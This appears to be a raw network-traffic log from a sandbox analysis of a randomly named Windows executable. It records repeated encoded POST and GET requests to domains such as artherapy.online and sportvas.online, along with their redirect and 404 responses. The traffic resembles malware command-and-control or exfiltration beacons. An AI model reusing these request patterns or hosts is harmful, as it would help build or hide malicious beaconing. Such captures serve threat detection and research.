                                                                                                      Nov 26, 2024 09:50:11.828598022 CET525OUTGET /15nb/?ozM=pHXpHpbXjHh&tHv=Hgx7D7c94bF86Gv92+yjgs/yvRJ2LxxXy6gMxHkS7HMnVUr5oc0+TmqN38rGM6nu+PH6deqPjc/6oqr55b0ehJlYtckfPgfvzmtbNAVJOGyxKh5z9A== HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Host: www.fzaqzjja.shop
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Nov 26, 2024 09:50:13.615274906 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Tue, 26 Nov 2024 08:50:13 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      x-redirect-by: WordPress
                                                                                                      location: https://fzaqzjja.shop/15nb/?ozM=pHXpHpbXjHh&tHv=Hgx7D7c94bF86Gv92+yjgs/yvRJ2LxxXy6gMxHkS7HMnVUr5oc0+TmqN38rGM6nu+PH6deqPjc/6oqr55b0ehJlYtckfPgfvzmtbNAVJOGyxKh5z9A==
                                                                                                      x-litespeed-cache-control: public,max-age=3600
                                                                                                      x-litespeed-tag: e69_HTTP.404,e69_HTTP.301,e69_404,e69_URL.2d01c4290965c4ade8b79576f8e75022,e69_
                                                                                                      x-litespeed-cache: miss
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yiJdAPYif6LjSUTamNOtSKT%2BRVIefxrcE6ak6c1wVfognQFZxVuLwjKj0ON2vHtcgnKt1gCBFUGXGd5kY5GO7ZZunsIFfzNftNp3ZEZn%2FAnd5nrOq6cNBsAz83yK%2F3EVeeskKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8e88a12da9244398-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=525&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Nov 26, 2024 09:50:13.615350008 CET7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.9498773.33.130.190803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:50:29.337846041 CET797OUTPOST /1vmx/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Host: www.artherapy.online
                                                                                                      Origin: http://www.artherapy.online
                                                                                                      Referer: http://www.artherapy.online/1vmx/
                                                                                                      Content-Length: 192
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Data Raw: 74 48 76 3d 77 6d 75 68 55 74 63 71 68 78 4d 47 30 74 72 63 56 47 4e 76 36 37 53 70 45 47 7a 66 67 62 63 48 64 74 73 62 45 42 4e 4c 57 4b 54 4b 2b 31 64 39 4e 73 75 51 54 53 6d 6f 66 4c 63 50 31 69 53 66 6c 38 41 42 6c 67 6e 6c 62 41 44 49 35 68 44 4c 69 71 66 4e 62 38 6a 70 46 46 45 69 64 62 6e 31 48 76 73 50 44 70 6b 71 65 4d 4b 52 50 30 66 30 61 73 62 52 74 42 49 59 37 48 73 41 45 6a 65 70 43 41 2f 67 67 45 4f 6b 38 71 48 37 65 77 44 36 5a 77 6f 61 7a 2f 65 48 56 47 4f 6b 79 73 6f 61 73 59 31 76 47 65 76 30 6b 33 61 4b 56 68 68 4e 36 31 44 42 6c 7a 6d 41 6a 76 50 70
                                                                                                      Data Ascii: tHv=wmuhUtcqhxMG0trcVGNv67SpEGzfgbcHdtsbEBNLWKTK+1d9NsuQTSmofLcP1iSfl8ABlgnlbADI5hDLiqfNb8jpFFEidbn1HvsPDpkqeMKRP0f0asbRtBIY7HsAEjepCA/ggEOk8qH7ewD6Zwoaz/eHVGOkysoasY1vGev0k3aKVhhN61DBlzmAjvPp


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.9498833.33.130.190803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:50:32.002074957 CET821OUTPOST /1vmx/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Host: www.artherapy.online
                                                                                                      Origin: http://www.artherapy.online
                                                                                                      Referer: http://www.artherapy.online/1vmx/
                                                                                                      Content-Length: 216
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Data Raw: 74 48 76 3d 77 6d 75 68 55 74 63 71 68 78 4d 47 79 39 62 63 54 6c 56 76 38 62 54 62 61 57 7a 66 72 37 63 4c 64 73 51 62 45 44 67 57 57 35 33 4b 2b 55 74 39 43 4e 75 51 51 53 6d 6f 58 72 63 4b 6f 53 53 55 6c 38 4e 38 6c 68 62 6c 62 41 48 49 35 67 54 4c 69 64 44 4b 5a 73 6a 72 4b 6c 45 67 5a 62 6e 31 48 76 73 50 44 70 78 50 65 4d 69 52 4f 45 50 30 61 4f 7a 53 7a 78 49 5a 72 33 73 41 41 6a 65 74 43 41 2f 34 67 46 6a 4c 38 70 2f 37 65 31 48 36 65 6b 31 4d 36 2f 66 4d 4b 57 50 68 7a 76 52 32 33 71 4a 43 49 34 72 65 6d 32 4f 4b 62 67 42 54 72 48 4b 61 77 6b 6d 6e 6b 49 47 42 78 63 2f 61 66 54 6d 64 42 2b 4d 33 4a 2b 53 71 56 4d 6b 62 6b 41 3d 3d
                                                                                                      Data Ascii: tHv=wmuhUtcqhxMGy9bcTlVv8bTbaWzfr7cLdsQbEDgWW53K+Ut9CNuQQSmoXrcKoSSUl8N8lhblbAHI5gTLidDKZsjrKlEgZbn1HvsPDpxPeMiROEP0aOzSzxIZr3sAAjetCA/4gFjL8p/7e1H6ek1M6/fMKWPhzvR23qJCI4rem2OKbgBTrHKawkmnkIGBxc/afTmdB+M3J+SqVMkbkA==


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.9498893.33.130.190803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:50:34.775480032 CET1834OUTPOST /1vmx/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Host: www.artherapy.online
                                                                                                      Origin: http://www.artherapy.online
                                                                                                      Referer: http://www.artherapy.online/1vmx/
                                                                                                      Content-Length: 1228
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Data Raw: 74 48 76 3d 77 6d 75 68 55 74 63 71 68 78 4d 47 79 39 62 63 54 6c 56 76 38 62 54 62 61 57 7a 66 72 37 63 4c 64 73 51 62 45 44 67 57 57 35 2f 4b 2b 47 6c 39 44 71 53 51 66 79 6d 6f 57 72 63 4c 6f 53 53 46 6c 38 55 37 6c 68 58 50 62 44 76 49 72 53 4c 4c 6b 70 33 4b 54 73 6a 72 49 6c 45 74 64 62 6d 6f 48 76 38 4c 44 70 68 50 65 4d 69 52 4f 43 7a 30 59 63 62 53 78 78 49 59 37 48 73 4d 45 6a 65 4a 43 41 6e 47 67 46 6d 30 38 5a 66 37 51 31 33 36 62 52 70 4d 69 76 66 4f 4a 57 50 48 7a 75 74 70 33 71 55 37 49 34 33 30 6d 78 36 4b 61 31 4d 6e 37 7a 65 33 7a 79 32 78 6b 75 4f 35 34 72 6e 75 61 78 62 46 57 38 6f 34 5a 74 72 35 41 50 77 57 2f 39 76 78 54 55 4e 35 79 49 70 4a 67 4a 6e 36 61 41 56 62 4f 6b 37 52 78 6a 33 34 41 54 65 79 62 78 4e 61 31 68 49 56 51 2b 62 78 4c 46 75 34 56 52 4f 30 7a 31 75 55 2f 6e 4c 69 41 52 57 43 50 32 43 2f 54 6d 50 79 6b 6e 65 4e 44 33 58 72 68 4a 5a 7a 44 2f 48 6e 76 34 71 51 33 78 52 47 36 39 36 42 76 58 76 46 54 67 50 64 39 77 49 79 35 55 2b 61 2b 49 43 58 71 48 38 58 6c 4f [TRUNCATED]
                                                                                                      Data Ascii: tHv=wmuhUtcqhxMGy9bcTlVv8bTbaWzfr7cLdsQbEDgWW5/K+Gl9DqSQfymoWrcLoSSFl8U7lhXPbDvIrSLLkp3KTsjrIlEtdbmoHv8LDphPeMiROCz0YcbSxxIY7HsMEjeJCAnGgFm08Zf7Q136bRpMivfOJWPHzutp3qU7I430mx6Ka1Mn7ze3zy2xkuO54rnuaxbFW8o4Ztr5APwW/9vxTUN5yIpJgJn6aAVbOk7Rxj34ATeybxNa1hIVQ+bxLFu4VRO0z1uU/nLiARWCP2C/TmPykneND3XrhJZzD/Hnv4qQ3xRG696BvXvFTgPd9wIy5U+a+ICXqH8XlOx0Da3p5lq1qIUvWPiK3E7TSNiDtoS59oaJRxpRY1exJH3afAz2z/lY2d3s2v9BnC6mtmLr5ouYudhARWHzXQzil0gTG0DqQBsA3M7ke7txbbT1S2zpW6IORE2wiMhS08fiWAk3QDbz7ZbbyDtSJxj7hHXsjgsvrjY4xI2qiNIDMNw9/gpOdGw6D0ddo6Iel6fZDT+XodnYgr07jG05dISnwJul1x5Q4qngy4eaNcUE1Y0/TT9B9SLeqORMJ6smbnv9+R21UVKUhqTPEmi8t/e7Ng1vLYzb4ua72yY+pCdbQf8qVx4VrpD4ehonPw6BYAb4kh+YKUiEDu06pWqrG6TRwGShSSNC8EQ/uohaPu39Ung2ygB8c7akoMRxQj4W4uvThlW0Va/diBTrcA0O5dch+zIb+Le3Z4ufK7+6ikfNUYZjtzXLACHBsIrXDxx9cnhytSdJ3v8sa0p3MFITwpyarwa4GDjnJ1pnVLf2iBL/y18DSC73ZIZfbMUU/7rhxCWs27gVVf1B1HFE3cyVLOVlLyLrT0+3eLTtpzrSculzxxG4jmGkxl2btUTGiilji+2zRlOKZdlHv2DT32AqPbg7sBkBbwZZBZNZ/TbciGiwRuLX8FVKulM/GZ1OQY2fos18LFbk+JPdVdNMmf9XuBUe4EInTQsskMMJ [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.9498983.33.130.190803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:50:37.460222006 CET528OUTGET /1vmx/?tHv=9kGBXZxppSQGpsPva2hO1+7FFAv7jYBlVf8dDAttQ7XT+XAQL8eiKk2eaOwq2QP12Mcq0wHIaRfipn6rrYH4WdTaAnEdft+eZsAaNr4LIp/0Hia2Jg==&ozM=pHXpHpbXjHh HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Host: www.artherapy.online
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Nov 26, 2024 09:50:38.575115919 CET391INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 26 Nov 2024 08:50:38 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 251
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 74 48 76 3d 39 6b 47 42 58 5a 78 70 70 53 51 47 70 73 50 76 61 32 68 4f 31 2b 37 46 46 41 76 37 6a 59 42 6c 56 66 38 64 44 41 74 74 51 37 58 54 2b 58 41 51 4c 38 65 69 4b 6b 32 65 61 4f 77 71 32 51 50 31 32 4d 63 71 30 77 48 49 61 52 66 69 70 6e 36 72 72 59 48 34 57 64 54 61 41 6e 45 64 66 74 2b 65 5a 73 41 61 4e 72 34 4c 49 70 2f 30 48 69 61 32 4a 67 3d 3d 26 6f 7a 4d 3d 70 48 58 70 48 70 62 58 6a 48 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?tHv=9kGBXZxppSQGpsPva2hO1+7FFAv7jYBlVf8dDAttQ7XT+XAQL8eiKk2eaOwq2QP12Mcq0wHIaRfipn6rrYH4WdTaAnEdft+eZsAaNr4LIp/0Hia2Jg==&ozM=pHXpHpbXjHh"}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.949914184.94.215.26803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:50:43.867957115 CET794OUTPOST /omdp/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Host: www.sportvas.online
                                                                                                      Origin: http://www.sportvas.online
                                                                                                      Referer: http://www.sportvas.online/omdp/
                                                                                                      Content-Length: 192
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Data Raw: 74 48 76 3d 4b 63 6b 4f 2f 31 55 74 31 43 54 6c 37 56 78 4e 73 72 6b 4e 39 6a 39 47 59 4c 66 66 70 53 5a 34 51 74 67 77 77 65 78 45 79 6f 59 6a 4b 72 6e 35 6c 37 42 73 71 6e 65 61 4c 79 49 48 54 30 55 76 72 45 32 41 39 4b 47 6a 5a 43 4f 4f 45 6d 74 62 48 4e 33 44 4b 37 6f 4d 70 54 4f 39 41 68 47 6c 6f 4e 55 33 53 4d 50 2f 65 49 4f 45 33 36 49 68 42 39 6f 38 64 67 36 32 79 59 6f 34 62 38 34 6b 4f 2f 6a 48 2b 41 6c 50 65 68 47 4f 38 2f 65 39 76 46 6b 41 41 43 59 2f 49 4f 51 48 5a 73 57 42 52 67 2b 52 75 46 4c 2f 74 78 2f 76 4d 50 55 79 30 65 4a 45 5a 53 7a 4b 36 57 47 43
                                                                                                      Data Ascii: tHv=KckO/1Ut1CTl7VxNsrkN9j9GYLffpSZ4QtgwwexEyoYjKrn5l7BsqneaLyIHT0UvrE2A9KGjZCOOEmtbHN3DK7oMpTO9AhGloNU3SMP/eIOE36IhB9o8dg62yYo4b84kO/jH+AlPehGO8/e9vFkAACY/IOQHZsWBRg+RuFL/tx/vMPUy0eJEZSzK6WGC
                                                                                                      Nov 26, 2024 09:50:45.134304047 CET1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 26 Nov 2024 08:50:44 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 13840
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                                                                      Nov 26, 2024 09:50:45.134371042 CET1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                                                                                      Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                                                                                                      Nov 26, 2024 09:50:45.134428978 CET448INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                                                                                                      Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                                                                                                      Nov 26, 2024 09:50:45.134463072 CET1236INData Raw: 34 2d 35 35 2e 35 34 32 20 31 39 2e 38 38 34 2d 31 31 32 2e 31 35 37 20 33 36 2e 34 39 2d 31 36 37 2e 38 34 39 20 35 35 2e 39 36 33 2d 32 30 2e 38 31 20 37 2e 32 37 35 2d 34 34 2e 39 31 20 31 38 2e 36 30 36 2d 34 38 2e 37 36 36 20 34 31 2e 39 32
                                                                                                      Data Ascii: 4-55.542 19.884-112.157 36.49-167.849 55.963-20.81 7.275-44.91 18.606-48.766 41.922z"/> </defs> <g fill="none" fill-rule="evenodd"> <path fill="#FFF" d="M0 0H1366V800H0z" transform="translate(-448 -157)"/> <g transform=
                                                                                                      Nov 26, 2024 09:50:45.134499073 CET1236INData Raw: 30 37 2d 33 2e 31 39 36 20 32 2e 35 35 38 2d 33 34 2e 38 30 35 20 32 33 2e 35 32 36 2d 39 39 2e 35 34 20 31 32 2e 33 37 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20
                                                                                                      Data Ascii: 07-3.196 2.558-34.805 23.526-99.54 12.379" transform="translate(161 68)"/> <path fill="#FFDA7F" d="M5.679 131.837c-6.522 1.646-.275 6.91 9.492 12.14 9.767 5.229 28.24 10.257 44.267 10.015 16.028-.243 37.48-.481 52.543-5.333 15.
                                                                                                      Nov 26, 2024 09:50:45.134531021 CET448INData Raw: 31 2e 34 34 36 2e 36 31 2d 31 2e 37 37 34 20 31 2e 30 39 38 2d 2e 31 36 38 2e 32 34 38 2d 2e 33 2e 35 31 32 2d 2e 33 31 37 2e 37 39 32 2d 2e 30 31 37 2e 33 31 33 2e 31 35 34 2e 35 30 33 2e 32 39 2e 37 37 36 2e 32 34 39 2e 34 39 34 20 31 2e 32 34
                                                                                                      Data Ascii: 1.446.61-1.774 1.098-.168.248-.3.512-.317.792-.017.313.154.503.29.776.249.494 1.245.392 1.22-.162-.014-.274.33-.612.54-.817.367-.361.75-.62.923-1.075.154-.404-.413-.7-.882-.612M51.621 9.247c-.182-.409-.68-.325-.615.364.063.687.007 1.485.25 2.0
                                                                                                      Nov 26, 2024 09:50:45.134582043 CET1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                                                                                                      Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                                                                                                      Nov 26, 2024 09:50:45.134614944 CET1236INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                                                                                                      Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                                                                                                      Nov 26, 2024 09:50:45.134649038 CET448INData Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                                                                                                      Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                                                                                                      Nov 26, 2024 09:50:45.134704113 CET1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                                                                                                      Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                                                                                                      Nov 26, 2024 09:50:45.254863977 CET1236INData Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                                                                                                      Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.949921184.94.215.26803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:50:46.528589964 CET818OUTPOST /omdp/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Host: www.sportvas.online
                                                                                                      Origin: http://www.sportvas.online
                                                                                                      Referer: http://www.sportvas.online/omdp/
                                                                                                      Content-Length: 216
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Connection: close
